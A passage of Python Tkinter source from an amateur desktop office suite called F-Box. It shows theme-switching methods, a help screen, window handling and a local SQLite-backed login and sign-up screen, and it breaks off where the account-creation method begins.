var2=Checkbutton(self.frame,text='',var=self.va1,onvalue=2,bd=1,borderwidth=0,command=self.config_themes).grid(row=4,column=2,sticky='w')
var3=Checkbutton(self.frame,text='',var=self.va1,onvalue=3,bd=1,borderwidth=0,command=self.config_themes).grid(row=5,column=2,sticky='w')
var4=Checkbutton(self.frame,text='',var=self.va1,onvalue=4,bd=1,borderwidth=0,command=self.config_themes).grid(row=6,column=2,sticky='w')
#security fuction for settings menu
def security(self):
self.hsc.grid_forget()
self.hsc1.grid_forget()
self.hc.grid_forget()
self.frame.grid_forget()
account=Button(self.frame3,text='Account',font=('helvectica',13),bd=2,borderwidth=0,fg='red',bg='white')
account.grid(row=0,column=0)
namesl=Label(self.frame3,text='Users',font=('helveectica',13,'bold'),bd=0,borderwidth=0,bg='white',fg='black')
namesl.grid(row=1,column=0,pady=15)
acct_list=ttk.Treeview(self.frame3,column=('A'))
acct_list.heading('#0',text='Users',anchor='center')
acct_list.column('A',anchor='center',width=100)
account=sqlite3.connect('account.db')
connet=account.cursor()
user_name=connet.execute("SELECT name FROM account").fetchall()
pass_word=connet.execute("SELECT password FROM account").fetchall()
account.commit()
account.close()
for c in user_name:
acct_list.insert('','end',text=c[0])
acct_list.grid(row=3)
self.frame3.grid(row=4,column=0,sticky='nwes')
# configure functions fuction for security menu
def cf(self):
self.hsc.grid_forget()
self.hsc1.grid_forget()
self.hc.grid_forget()
self.frame4.grid_forget()
self.frame3.grid_forget()
self.frame.grid_forget()
# How it works Fuction for the security menu
def hiw(self):
self.hsc.grid_forget()
self.hsc1.grid_forget()
self.hc.grid_forget()
self.frame4.grid_forget()
self.frame3.grid_forget()
self.frame.grid_forget()
hl=Label(self.frame4,text=''' The F-Box is a miniature office suite it comprises (spreadsheets,word processor,fileviewer),this would be coagulated
together to form a single piece of software namely F-Box. Use of the F-Box is very simple and straight foward there are
no needs for prior experiences of using a word processor or spreadsheets i.e anyone can use it.
How to use the F-Box:
1 )The spreadsheets menus(Financials,Monthly) are limited compared to other ones out there but it can solve some basic things
and it also have inbuit functions to perfom mathematical and staistical analysis.
2) The spreadsheets menus are only built with 26,rows and 8 columns, the 26 rows and 8 columns can be used interchangeably without
errors, to do that you set that in the settings
3) The spreadsheets and the memo menus are both built to print out saved docs by your defaults printers. Also the printing can aslo
be done through the saved files menu.
4) Both the spreadsheets and the memo has edit functions i.e you can edit already saved files...Note(only the one done on F-Box not
any other software.
5) The memo is like a text editor which is more advanced i.e you can input images for better editing of your memos.
6) The products isn't perfect but it can be used to perform basic analysis and not large analysis.
7) The app and your saved docs are protected and no need for fear of loss of datas and it being governed by your acoount created when
you first open the F-Box.''',justify='left')
hl.grid(row=1,sticky='w')
self.hc.update_idletasks()
self.hc.create_window(0,0,anchor='w',window=self.frame4)
self.hc.config(scrollregion=self.hc.bbox('all'),yscrollcommand=self.hsc.set,xscrollcommand=self.hsc1.set)
self.hsc.config(command=self.hc.yview)
self.hsc1.config(command=self.hc.xview)
self.hsc1.grid(row=5,column=0,sticky='ew')
self.hsc.grid(row=4,column=1,sticky='ns')
#self.frame4.grid(row=4)
self.hc.grid(row=4,column=0,sticky='w')
# About function for the about menu
def about(self):
self.hsc.grid_forget()
self.hsc1.grid_forget()
self.hc.grid_forget()
self.frame4.grid_forget()
self.frame3.grid_forget()
self.frame.grid_forget()
self.frame2.grid_forget()
# Support and Donation function for security and donaton menu
def sad(self):
self.hsc.grid_forget()
self.hsc1.grid_forget()
self.hc.grid_forget()
self.frame4.grid_forget()
self.frame3.grid_forget()
self.frame.grid_forget()
self.frame2.grid_forget()
# restore App to factory setting function menu
def ras(self):
self.hsc.grid_forget()
self.hsc1.grid_forget()
self.hc.grid_forget()
self.frame4.grid_forget()
self.frame3.grid_forget()
self.frame.grid_forget()
self.frame2.grid_forget()
print('ye4')
#funtion that changes live i.e it changes the thmeme of individual menus while the programm is still running if the Picke is o the the the theme
#remains unchanged and if higer than 0 it changes through (grey,black,blue,white)
def config_themes(self):
self.var_butt=self.va1.get()
with open('check.pkl','wb') as f1:
pickle.dump(self.var_butt,f1)
with open('check.pkl','rb') as f1:
self.data=pickle.load(f1)
if self.data==0:
try:
self.c4.config(bg='white')
self.testy.config(bg='white')
self.config.config(bg='white')
self.test10.config(bg='white')
self.test9.config(bg='white')
self.c3.config(bg='white')
self.testf.config(bg='white')
self.toolbar.config(bg='white')
self.toolbar2.config(bg='white')
self.f6.config(bg='white')
self.f7.config(bg='white')
self.top.config(bg='white')
self.top5.config(bg='white')
self.one.config(bg='white',fg='black',activebackground='grey',activeforeground='white')
self.two.config(bg='white',fg='black',activebackground='grey',activeforeground='white')
self.three.config(bg='white',fg='black',activebackground='grey',activeforeground='white')
self.four.config(bg='white',fg='black',activebackground='grey',activeforeground='white')
self.five.config(bg='white',fg='black',activebackground='grey',activeforeground='white')
self.six.config(bg='white')
self.seven.config(bg='white')
self.eight.config(bg='white')
self.option.config(bg='white',fg='black')
for c,c1,c2,c3,c4,c5,c6,c7,c8 in zip(kist,list2,list3,list4,list5,list6,list7,list8,list9):
c.configure(fg='black',bg='white',insertbackground='black')
c1.configure(fg='black',bg='white',insertbackground='black')
c2.configure(fg='black',bg='white',insertbackground='black')
c3.configure(fg='black',bg='white',insertbackground='black')
c4.configure(fg='black',bg='white',insertbackground='black')
c5.configure(fg='black',bg='white',insertbackground='black')
c6.configure(fg='black',bg='white',insertbackground='black')
c7.configure(fg='black',bg='white',insertbackground='black')
c8.configure(fg='black',bg='white',insertbackground='black')
for c9,c10 in zip(h10,h11):
c9.configure(bg='white')
c10.configure(bg='white')
self.p1.configure(fg='black')
except AttributeError:
self.option.config(bg='white',fg='black')
self.top5.config(bg='white')
if self.data==1:
try:
self.c4.config(bg='grey')
self.testy.config(bg='grey')
self.config.config(bg='grey')
self.c3.config(bg='grey')
self.testf.config(bg='grey')
self.test10.config(bg='grey')
self.test9.config(bg='grey')
self.testy.config(bg='grey')
self.toolbar.config(bg='grey')
self.toolbar2.config(bg='grey')
self.f6.config(bg='grey')
self.f7.config(bg='grey')
self.one.config(bg='grey',fg='white',activebackground='black',activeforeground='white')
self.two.config(bg='grey',fg='white',activebackground='black',activeforeground='white')
self.three.config(bg='grey',fg='white',activebackground='black',activeforeground='white')
self.four.config(bg='grey',fg='white',activebackground='black',activeforeground='white')
self.five.config(bg='grey',fg='white',activebackground='black',activeforeground='white')
self.six.config(bg='grey')
self.seven.config(bg='grey')
self.eight.config(bg='grey')
self.top.config(bg='grey')
self.top5.configure(bg='grey')
self.option.config(bg='grey',fg='white')
for c,c1,c2,c3,c4,c5,c6,c7,c8 in zip(kist,list2,list3,list4,list5,list6,list7,list8,list9):
c.configure(bg='grey',fg='white',insertbackground='white')
c1.configure(bg='grey',fg='white',insertbackground='white')
c2.configure(bg='grey',fg='white',insertbackground='white')
c3.configure(bg='grey',fg='white',insertbackground='white')
c4.configure(bg='grey',fg='white',insertbackground='white')
c5.configure(bg='grey',fg='white',insertbackground='white')
c6.configure(bg='grey',fg='white',insertbackground='white')
c7.configure(bg='grey',fg='white',insertbackground='white')
c8.configure(bg='grey',fg='white',insertbackground='white')
for c9,c10 in zip(h10,h11):
c9.configure(bg='grey')
c10.configure(bg='grey',fg='white')
self.p1.configure(fg='white')
except AttributeError:
self.option.config(bg='grey',fg='white')
self.top5.config(bg='grey')
if self.data==2:
try:
self.c4.config(bg='black')
self.testy.config(bg='black')
self.c3.config(bg='black')
self.testf.config(bg='black')
self.config.config(bg='black')
self.test10.config(bg='black')
self.test9.config(bg='black')
self.testy.config(bg='black')
self.toolbar.config(bg='black')
self.toolbar2.config(bg='black')
self.f6.config(bg='black')
self.f7.config(bg='black')
self.one.config(bg='black',fg='white',activebackground='grey',activeforeground='white')
self.two.config(bg='black',fg='white',activebackground='grey',activeforeground='white')
self.three.config(bg='black',fg='white',activebackground='grey',activeforeground='white')
self.four.config(bg='black',fg='white',activebackground='grey',activeforeground='white')
self.five.config(bg='black',fg='white',activebackground='grey',activeforeground='white')
self.six.config(bg='black')
self.seven.config(bg='black')
self.eight.config(bg='black')
self.top.config(bg='black')
self.top5.config(bg='black')
self.option.config(bg='black',fg='white')
for c,c1,c2,c3,c4,c5,c6,c7,c8 in zip(kist,list2,list3,list4,list5,list6,list7,list8,list9):
c.configure(bg='black',fg='white',insertbackground='white')
c1.configure(bg='black',fg='white',insertbackground='white')
c2.configure(bg='black',fg='white',insertbackground='white')
c3.configure(bg='black',fg='white',insertbackground='white')
c4.configure(bg='black',fg='white',insertbackground='white')
c5.configure(bg='black',fg='white',insertbackground='white')
c6.configure(bg='black',fg='white',insertbackground='white')
c7.configure(bg='black',fg='white',insertbackground='white')
c8.configure(bg='black',fg='white',insertbackground='white')
for c9,c10 in zip(h10,h11):
c9.configure(bg='black')
c10.configure(bg='black',fg='white')
self.p1.configure(fg='white')
except AttributeError:
self.option.config(bg='black',fg='white')
self.top5.config(bg='black')
if self.data==3:
try:
self.c4.config(bg='#151930')
self.testy.config(bg='#151930')
self.c3.config(bg='#151930')
self.testf.config(bg='#151930')
self.config.config(bg='#151930')
self.test10.config(bg='#151930')
self.test9.config(bg='#151930')
self.testy.config(bg='#151930')
self.toolbar.config(bg='#151930')
self.toolbar2.config(bg='#151930')
self.f6.config(bg='#151930')
self.f7.config(bg='#151930')
self.one.config(bg='#151930',fg='white',activebackground='grey',activeforeground='white')
self.two.config(bg='#151930',fg='white',activebackground='grey',activeforeground='white')
self.three.config(bg='#151930',fg='white',activebackground='grey',activeforeground='white')
self.four.config(bg='#151930',fg='white',activebackground='grey',activeforeground='white')
self.five.config(bg='#151930',fg='white',activebackground='grey',activeforeground='white')
self.six.config(bg='#151930')
self.seven.config(bg='#151930')
self.eight.config(bg='#151930')
self.top.config(bg='#151930')
self.top5.config(bg='#151930')
self.option.config(bg='#151930',fg='white')
for c,c1,c2,c3,c4,c5,c6,c7,c8 in zip(kist,list2,list3,list4,list5,list6,list7,list8,list9):
c.configure(bg='#151930',fg='white',insertbackground='white')
c1.configure(bg='#151930',fg='white',insertbackground='white')
c2.configure(bg='#151930',fg='white',insertbackground='white')
c3.configure(bg='#151930',fg='white',insertbackground='white')
c4.configure(bg='#151930',fg='white',insertbackground='white')
c5.configure(bg='#151930',fg='white',insertbackground='white')
c6.configure(bg='#151930',fg='white',insertbackground='white')
c7.configure(bg='#151930',fg='white',insertbackground='white')
c8.configure(bg='#151930',fg='white',insertbackground='white')
for c9,c10 in zip(h10,h11):
c9.configure(bg='#151930')
c10.configure(bg='#151930',fg='white')
self.p1.configure(fg='white')
except AttributeError:
self.option.config(bg='#151930',fg='white')
self.top5.config(bg='#151930')
if self.data==4:
try:
self.c4.config(bg='white')
self.testy.config(bg='white')
self.c3.config(bg='white')
self.testf.config(bg='white')
self.config.config(bg='white')
self.test10.config(bg='white')
self.test9.config(bg='white')
self.testy.config(bg='white')
self.toolbar.config(bg='white')
self.toolbar2.config(bg='white')
self.f6.config(bg='white')
self.f7.config(bg='white')
self.one.config(bg='white',fg='black',activebackground='grey',activeforeground='white')
self.two.config(bg='white',fg='black',activebackground='grey',activeforeground='white')
self.three.config(bg='white',fg='black',activebackground='grey',activeforeground='white')
self.four.config(bg='white',fg='black',activebackground='grey',activeforeground='white')
self.five.config(bg='white',fg='black',activebackground='grey',activeforeground='white')
self.six.config(bg='white')
self.seven.config(bg='white')
self.eight.config(bg='white')
self.top.config(bg='white')
self.top5.config(bg='white')
self.option.config(bg='white',fg='black')
for c,c1,c2,c3,c4,c5,c6,c7,c8 in zip(kist,list2,list3,list4,list5,list6,list7,list8,list9):
c.configure(bg='white',fg='black',insertbackground='black')
c1.configure(bg='white',fg='black',insertbackground='black')
c2.configure(bg='white',fg='black',insertbackground='black')
c3.configure(bg='white',fg='black',insertbackground='black')
c4.configure(bg='white',fg='black',insertbackground='black')
c5.configure(bg='white',fg='black',insertbackground='black')
c6.configure(bg='white',fg='black',insertbackground='black')
c7.configure(bg='white',fg='black',insertbackground='black')
c8.configure(bg='white',fg='black',insertbackground='black')
for c9,c10 in zip(h10,h11):
c9.configure(bg='white')
c10.configure(bg='white',fg='black')
self.p1.configure(fg='black')
except AttributeError:
self.option.config(bg='white',fg='black')
self.top5.config(bg='white')
#fuction tp change the setttings menu thmeme
def config_themes2(self):
if self.data==0:
self.top5.config(bg='white')
self.option.config(bg='white',fg='black')
if self.data==1:
self.top5.configure(bg='grey')
self.option.config(bg='grey',fg='white')
if self.data==2:
self.top5.config(bg='black')
self.option.config(bg='black',fg='white')
if self.data==3:
self.top5.config(bg='#151930')
self.option.config(bg='#151930',fg='white')
if self.data==4:
self.top5.config(bg='white')
self.option.config(bg='white',fg='black')
#function to change the F-analysis theme
def config_themes5(self):
try:
if self.data==0:
self.c4.config(bg='white')
self.testy.config(bg='white')
self.c3.config(bg='white')
self.testf.config(bg='white')
self.config.config(bg='white')
self.test10.config(bg='white')
self.toolbar.config(bg='white')
self.toolbar2.config(bg='white')
self.f6.config(bg='white')
self.f7.config(bg='white')
self.top.config(bg='white')
self.test9.config(bg='white')
self.one.config(bg='white',fg='black',activebackground='grey',activeforeground='white')
self.two.config(bg='white',fg='black',activebackground='grey',activeforeground='white')
self.three.config(bg='white',fg='black',activebackground='grey',activeforeground='white')
self.four.config(bg='white',fg='black',activebackground='grey',activeforeground='white')
self.five.config(bg='white',fg='black',activebackground='grey',activeforeground='white')
self.six.config(bg='white')
self.seven.config(bg='white')
self.eight.config(bg='white')
for c,c1,c2,c3,c4,c5,c6,c7,c8 in zip(kist,list2,list3,list4,list5,list6,list7,list8,list9):
c.configure(fg='black',bg='white')
c1.configure(fg='black',bg='white')
c2.configure(fg='black',bg='white')
c3.configure(fg='black',bg='white')
c4.configure(fg='black',bg='white')
c5.configure(fg='black',bg='white')
c6.configure(fg='black',bg='white')
c7.configure(fg='black',bg='white')
c8.configure(fg='black',bg='white')
for c9,c10 in zip(h10,h11):
c9.configure(bg='white')
c10.configure(bg='white')
self.p1.configure(fg='black')
if self.data==1:
self.c4.config(bg='grey')
self.c3.config(bg='grey')
self.testf.config(bg='grey')
self.testy.config(bg='grey')
self.config.config(bg='grey')
self.test10.config(bg='grey')
self.toolbar.config(bg='grey')
self.toolbar2.config(bg='grey')
self.test9.config(bg='grey')
self.f6.config(bg='grey')
self.f7.config(bg='grey')
self.one.config(bg='grey',fg='white',activebackground='black',activeforeground='white')
self.two.config(bg='grey',fg='white',activebackground='black',activeforeground='white')
self.three.config(bg='grey',fg='white',activebackground='black',activeforeground='white')
self.four.config(bg='grey',fg='white',activebackground='black',activeforeground='white')
self.five.config(bg='grey',fg='white',activebackground='black',activeforeground='white')
self.six.config(bg='grey')
self.seven.config(bg='grey')
self.eight.config(bg='grey')
self.top.config(bg='grey')
for c,c1,c2,c3,c4,c5,c6,c7,c8 in zip(kist,list2,list3,list4,list5,list6,list7,list8,list9):
c.configure(bg='grey',fg='white')
c1.configure(bg='grey',fg='white')
c2.configure(bg='grey',fg='white')
c3.configure(bg='grey',fg='white')
c4.configure(bg='grey',fg='white')
c5.configure(bg='grey',fg='white')
c6.configure(bg='grey',fg='white')
c7.configure(bg='grey',fg='white')
c8.configure(bg='grey',fg='white')
for c9,c10 in zip(h10,h11):
c9.configure(bg='grey')
c10.configure(bg='grey',fg='white')
self.p1.configure(fg='white')
if self.data==2:
self.c4.config(bg='black')
self.c3.config(bg='black')
self.testf.config(bg='black')
self.testy.config(bg='black')
self.config.config(bg='black')
self.test10.config(bg='black')
self.toolbar.config(bg='black')
self.toolbar2.config(bg='black')
self.test9.config(bg='black')
self.f6.config(bg='black')
self.f7.config(bg='black')
self.one.config(bg='black',fg='white',activebackground='grey',activeforeground='white')
self.two.config(bg='black',fg='white',activebackground='grey',activeforeground='white')
self.three.config(bg='black',fg='white',activebackground='grey',activeforeground='white')
self.four.config(bg='black',fg='white',activebackground='grey',activeforeground='white')
self.five.config(bg='black',fg='white',activebackground='grey',activeforeground='white')
self.six.config(bg='black')
self.seven.config(bg='black')
self.eight.config(bg='black')
self.top.config(bg='black')
for c,c1,c2,c3,c4,c5,c6,c7,c8 in zip(kist,list2,list3,list4,list5,list6,list7,list8,list9):
c.configure(bg='black',fg='white',insertbackground='white')
c1.configure(bg='black',fg='white',insertbackground='white')
c2.configure(bg='black',fg='white',insertbackground='white')
c3.configure(bg='black',fg='white',insertbackground='white')
c4.configure(bg='black',fg='white',insertbackground='white')
c5.configure(bg='black',fg='white',insertbackground='white')
c6.configure(bg='black',fg='white',insertbackground='white')
c7.configure(bg='black',fg='white',insertbackground='white')
c8.configure(bg='black',fg='white',insertbackground='white')
for c9,c10 in zip(h10,h11):
c9.configure(bg='black')
c10.configure(bg='black',fg='white')
self.p1.configure(fg='white')
if self.data==3:
self.c4.config(bg='#151930')
self.c3.config(bg='#151930')
self.testy.config(bg='#151930')
self.testf.config(bg='#151930')
self.config.config(bg='#151930')
self.test10.config(bg='#151930')
self.toolbar.config(bg='#151930')
self.toolbar2.config(bg='#151930')
self.test9.config(bg='#151930')
self.f6.config(bg='#151930')
self.f7.config(bg='#151930')
self.one.config(bg='#151930',fg='white',activebackground='grey',activeforeground='white')
self.two.config(bg='#151930',fg='white',activebackground='grey',activeforeground='white')
self.three.config(bg='#151930',fg='white',activebackground='grey',activeforeground='white')
self.four.config(bg='#151930',fg='white',activebackground='grey',activeforeground='white')
self.five.config(bg='#151930',fg='white',activebackground='grey',activeforeground='white')
self.six.config(bg='#151930')
self.seven.config(bg='#151930')
self.eight.config(bg='#151930')
self.top.config(bg='#151930')
for c,c1,c2,c3,c4,c5,c6,c7,c8 in zip(kist,list2,list3,list4,list5,list6,list7,list8,list9):
c.configure(bg='#151930',fg='white',insertbackground='white')
c1.configure(bg='#151930',fg='white',insertbackground='white')
c2.configure(bg='#151930',fg='white',insertbackground='white')
c3.configure(bg='#151930',fg='white',insertbackground='white')
c4.configure(bg='#151930',fg='white',insertbackground='white')
c5.configure(bg='#151930',fg='white',insertbackground='white')
c6.configure(bg='#151930',fg='white',insertbackground='white')
c7.configure(bg='#151930',fg='white',insertbackground='white')
c8.configure(bg='#151930',fg='white',insertbackground='white')
for c9,c10 in zip(h10,h11):
c9.configure(bg='#151930')
c10.configure(bg='#151930',fg='white')
self.p1.configure(fg='white')
if self.data==4:
self.c4.config(bg='white')
self.c3.config(bg='white')
self.testf.config(bg='white')
self.testy.config(bg='white')
self.config.config(bg='white')
self.test10.config(bg='white')
self.toolbar.config(bg='white')
self.toolbar2.config(bg='white')
self.test9.config(bg='white')
self.f6.config(bg='white')
self.f7.config(bg='white')
self.one.config(bg='white',fg='black',activebackground='grey',activeforeground='white')
self.two.config(bg='white',fg='black',activebackground='grey',activeforeground='white')
self.three.config(bg='white',fg='black',activebackground='grey',activeforeground='white')
self.four.config(bg='white',fg='black',activebackground='grey',activeforeground='white')
self.five.config(bg='white',fg='black',activebackground='grey',activeforeground='white')
self.six.config(bg='white')
self.seven.config(bg='white')
self.eight.config(bg='white')
self.top.config(bg='white')
for c,c1,c2,c3,c4,c5,c6,c7,c8 in zip(kist,list2,list3,list4,list5,list6,list7,list8,list9):
c.configure(bg='white',fg='black')
c1.configure(bg='white',fg='black')
c2.configure(bg='white',fg='black')
c3.configure(bg='white',fg='black')
c4.configure(bg='white',fg='black')
c5.configure(bg='white',fg='black')
c6.configure(bg='white',fg='black')
c7.configure(bg='white',fg='black')
c8.configure(fg='black',bg='white')
for c9,c10 in zip(h10,h11):
c9.configure(bg='white')
c10.configure(bg='white',fg='black')
self.p1.configure(fg='black')
except TclError:
pass
def config_themes6(self):
if self.data==0:
self.rec1.config(bg='white',fg='black')
self.rec3.config(bg='white',fg='black')
self.rec6.config(bg='white',fg='black')
if self.data==1:
self.rec1.config(bg='grey',fg='white')
self.rec3.config(bg='grey',fg='white')
self.rec6.config(bg='grey',fg='white')
if self.data==2:
self.rec1.config(bg='black',fg='white')
self.rec3.config(bg='black',fg='white')
self.rec6.config(bg='black',fg='white')
if self.data==3:
self.rec1.config(bg='#151930',fg='white')
self.rec3.config(bg='#151930',fg='white')
self.rec6.config(bg='#151930',fg='white')
if self.data==4:
self.rec1.config(bg='white',fg='black')
self.rec3.config(bg='white',fg='black')
self.rec6.config(bg='white',fg='black')
def config_themes7(self):
if self.data==0:
self.cle.config(bg='white',activebackground='#8193F7')
self.sav.config(bg='white',activebackground='#8193F7')
if self.data==1:
self.cle.config(bg='grey',activebackground='#F0F4FF')
self.sav.config(bg='grey',activebackground='#F0F4FF')
if self.data==2:
self.cle.config(bg='black',activebackground='#969AA8')
self.sav.config(bg='black',activebackground='#969AA8')
if self.data==3:
self.cle.config(bg='#151930',activebackground='#1D2761')
self.sav.config(bg='#151930',activebackground='#1D2761')
if self.data==4:
self.cle.config(bg='white',activebackground='#8193F7')
self.sav.config(bg='white',activebackground='#8193F7')
def config_themes8(self):
if self.data==0:
self.cle1.config(bg='white',activebackground='#8193F7')
self.sav1.config(bg='white',activebackground='#8193F7')
if self.data==1:
self.cle1.config(bg='grey',activebackground='#F0F4FF')
self.sav1.config(bg='grey',activebackground='#F0F4FF')
if self.data==2:
self.cle1.config(bg='black',activebackground='#969AA8')
self.sav1.config(bg='black',activebackground='#969AA8')
if self.data==3:
self.cle1.config(bg='#151930',activebackground='#1D2761')
self.sav1.config(bg='#151930',activebackground='#1D2761')
if self.data==4:
self.cle1.config(bg='white',activebackground='#8193F7')
self.sav1.config(bg='white',activebackground='#8193F7')
def close(self,event):
self.top.destroy()
root.destroy()
def master_update(self,event):
#self.top.update()
t2=threading.Thread(target=self.update).start()
t1=threading.Thread(target=self.update2).start()
#threading.Thread(target=lambda:sleep(1)).start()
#t2=threading.Thread(target=self.update2)
#t2.start()
#t2.join()
#self.update2()
def update(self):
self.width=self.top.winfo_width()-1
self.height=self.top.winfo_height()-1
self.v.set(round(0.00625*self.width))
#self.top.update()
self.cong=ImageTk.PhotoImage(self.confi.resize((round(self.width/7.84),round(self.height/36))))
self.config.configure(image=self.cong)
self.back.config(font=('helvectica',self.v.get(),'bold'))
def update2(self):
self.top.update()
def forcer(self):
j=ctypes.windll.user32.GetParent(self.top.winfo_id())
style=ctypes.windll.user32.GetWindowLongPtrW(j,GWL_EXSTYLE)
style=style & -WS_EX_TOOLWINDOW
style=style | WS_EX_APPWINDOW
res=ctypes.windll.user32.SetWindowLongPtrW(j,GWL_EXSTYLE,style)
self.top.withdraw()
self.top.after(10,lambda:self.top.deiconify())
kist[0].focus_set()
#login screen which splashes before the core ussage of the app
class Login(Financial):
def __init__(self,object):
self.show=object.showit
self.data=object.data
self.myframe=object.myframe
def splash(self):
self.z=0
self.track2=1
self.splash_frame=Frame(root,bg='white')
screen1=root.winfo_screenwidth()
screen2=root.winfo_screenheight()
splash_width=round(root.winfo_screenwidth()/1.92)
splash_height=round(root.winfo_screenheight()/1.54)
p = Image.open("D:\FES2.png")
p = p.resize((50, 50))
self.toolwindow1=Canvas(root,width=splash_width,height=40,bg='black',highlightthickness=0)
self.toolwindow=Frame(self.toolwindow1,bg='black')
self.toolwindow1.grid(row=0,column=0,sticky='n')
self.destr=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\term.png")
self.mini=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\term2.png")
self.destr=ImageTk.PhotoImage(self.destr)
self.mini=ImageTk.PhotoImage(self.mini)
self.cancel=Button(self.toolwindow,image=self.destr,bd=0,borderwidth=0,command=lambda:root.destroy())
self.cancel.grid(row=0,column=9,sticky='e')
self.minimize=Button(self.toolwindow,image=self.mini,bd=0,borderwidth=0,command=self.resize)
self.minimize.grid(row=0,column=4,sticky='we',padx=round(root.winfo_screenwidth()/73.84))
self.cancel.bind('<Enter>',self.hover2)
self.cancel.bind('<Leave>',self.hover3)
self.minimize.bind('<Enter>',self.hover2)
self.minimize.bind('<Leave>',self.hover3)
p = ImageTk.PhotoImage(p)
root.iconphoto(False, p)
root.geometry("{}x{}+{}+{}".format(splash_width,splash_height,round((root.winfo_screenwidth()/2)-(splash_width/2)),
round((root.winfo_screenheight()/2)-(splash_height/2))))
root.title('F-BOX')
root.config(bg='white')
self.showb=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\show.png")
self.showb=ImageTk.PhotoImage(self.showb)
self.showc=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\show2.png")
self.showc=ImageTk.PhotoImage(self.showc)
self.logic=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\log.png")
self.logic=ImageTk.PhotoImage(self.logic)
self.creatic=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\create.png")
self.creatic=ImageTk.PhotoImage(self.creatic)
#Fess logo initiation and placement which was referenced in the initialization function
self.show.config(bg='white')
self.show.grid(row=1,column=0,sticky='n',pady=round(root.winfo_screenheight()/36),padx=round(root.winfo_screenwidth()/24))
root.resizable(0,0)
self.string=StringVar()
root.overrideredirect(True)
self.username = Entry(self.splash_frame, font=('helvectica', round(screen1*0.00678)), width=10)
self.l = Label(self.splash_frame, text='Enter Username', bg='white', fg='black')
self.l.grid(row=1, column=8, sticky='ns')
self.l2 = Label(self.splash_frame, text='Enter Password', bg='white', fg='black')
self.l2.grid(row=2, column=8, sticky='ns')
self.username.grid(row=1, column=9, sticky='ns', pady=5)
self.password = Entry(self.splash_frame,textvariable=self.string,font=('helvectica', round(screen1*0.00678)), width=10, show='*')
self.password.grid(row=2, column=9, sticky='ns', pady=5)
self.phone=Entry(self.splash_frame,font=('Helvectica', round(screen1*0.00678)),width=12)
self.l3=Label(self.splash_frame,text='Enter Phone Number',bg='white',fg='black')
self.hubby=Entry(self.splash_frame,font=('Helvectica', round(screen1*0.00678)),width=12)
self.l4=Label(self.splash_frame,text='Your Hubby',bg='white',fg='black')
self.l5=Label(self.splash_frame,text='* ALL FIELDS ARE REQUIRED',bg='white',fg='black')
self.visible=Button(self.splash_frame,image=self.showc,font=('Helvectica',5),command=self.visibility,borderwidth=0,bd=0)
self.sp2=Frame(self.splash_frame,bg='white')
self.loginb=Button(self.splash_frame,image=self.logic,bd=0,borderwidth=0,command=lambda e='i':self.logined(e))
self.logb=Button(self.sp2,image=self.creatic,bd=0,borderwidth=0,command=lambda event='e':self.create(event))
self.reg=Label(self.splash_frame,text='Sign Up',font=('helvectical',15,'bold'),bg='white',fg='blue')
self.login=Label(self.splash_frame,text='Login',font=('helvectical',20,'bold'),bg='white',fg='green')
#conditon whereby when theere is no account logged-in ten it askes one
#when there is an acoount logged in
if path.exists('account.db')==False:
account=sqlite3.connect('account.db')
connet=account.cursor()
connet.execute("CREATE TABLE account(name TEXT,password TEXT,phone TEXT,hubby TEXT)")
account.commit()
account.close()
if path.exists('account.db')==True:
account=sqlite3.connect('account.db')
connet=account.cursor()
cred1=connet.execute("SELECT name FROM account").fetchall()
account.commit()
account.close()
if len(cred1)>0:
self.regi=self.password.register(self.verify)
self.username.insert(0,cred1[0])
self.password.config(validate='key',validatecommand=(self.regi,'%V'))
self.login.grid(row=0,column=8,sticky='ns')
self.loginb.grid(row=4,column=8,sticky='ns')
self.visible.grid(row=2,column=10,sticky='ns')
self.password.focus_set()
self.id1=self.password.bind('<Return>',self.logined,'+')
print(self.password.index('insert'))
#conditon whereby when theere is no account logged-in ten it askes one
if len(cred1)==0:
self.l5.grid(row=0,column= 9,sticky='w')
self.username.config(validate='all',validatecommand=self.reg)
self.reg.grid(row=0,column=8,sticky='ns')
self.logb.grid(row=4,column=8,sticky='ns')
self.sp2.grid(row=5,column=8,sticky='ns')
self.phone.grid(row=3,column=9,sticky='ns',pady=5,padx=9)
self.l3.grid(row=3,column=8,sticky='ns',pady=5,padx=9)
self.l4.grid(row=4,column=8,sticky='ns',pady=5)
self.hubby.grid(row=4,column=9,sticky='ns',pady=5)
self.visible.grid(row=2,column=10,sticky='ns')
self.username.focus_set()
self.id2=root.bind('<Return>',self.create,'+')
#general Entry of password and username for both creation and logging in
self.toolwindow1.update_idletasks()
self.toolwindow1.create_window(round(screen1/2.07),round(screen2/120),anchor='n',window=self.toolwindow)
self.splash_frame.grid(row=2,sticky='ns')
self.config_themes3()
self.id4=self.toolwindow1.bind('<B1-Motion>',self.move2)
self.id5=self.toolwindow1.bind('<ButtonPress-1>',self.move)
self.id6=root.bind('<Map>',self.framed)
root.update()
root.after_idle(root.focus_force)
#Login fuction when login function is triggered
def logined(self,e):
screen1=root.winfo_screenwidth()
screen2=root.winfo_screenheight()
p = Image.open("D:\FES2.png")
p = p.resize((50, 50))
p = ImageTk.PhotoImage(p)
root.iconphoto(False, p)
cred2=self.password.get()
account=sqlite3.connect('account.db')
connet=account.cursor()
mes=[c for c in connet.execute("SELECT name,password FROM account").fetchmany(2)]
self.sp=Frame(self.myframe,bg='white')
self.forgotten=Button(self.sp,text='Forgot Credentials',font=('helvectica',10,'bold'),
activebackground='green',borderwidth=0,bd=0,bg='white',fg='green',command=self.forgot)
#condition when the password entered doesen't match with the one which was logged in before
if self.password.get()!=mes[0][1] or self.username.get()!=mes[0][0]:
error=showerror('Error','Username Or Pasword Wrong')
self.password.delete(0,'end')
self.password.config(width=10)
self.username.config(width=10)
try:
self.password.unbind('<Key>',self.id7)
self.track2=1
except:
pass
self.forgotten.grid(row=5,column=0,sticky='ns')
self.sp.grid(row=5,column=0,sticky='ns',ipadx=37)
self.myframe.grid()
#when the password is corect and corresponds with the one which was logged in
else:
self.splash_frame.grid_forget()
self.myframe.grid_forget()
self.sp2.grid_forget()
self.toolwindow.grid_forget()
self.toolwindow1.grid_forget()
first.display()
self.password.unbind('<Return>',self.id1)
self.config_themes4()
#when the 'create' button is triggered its perforrms the account creation
def create(self,event):
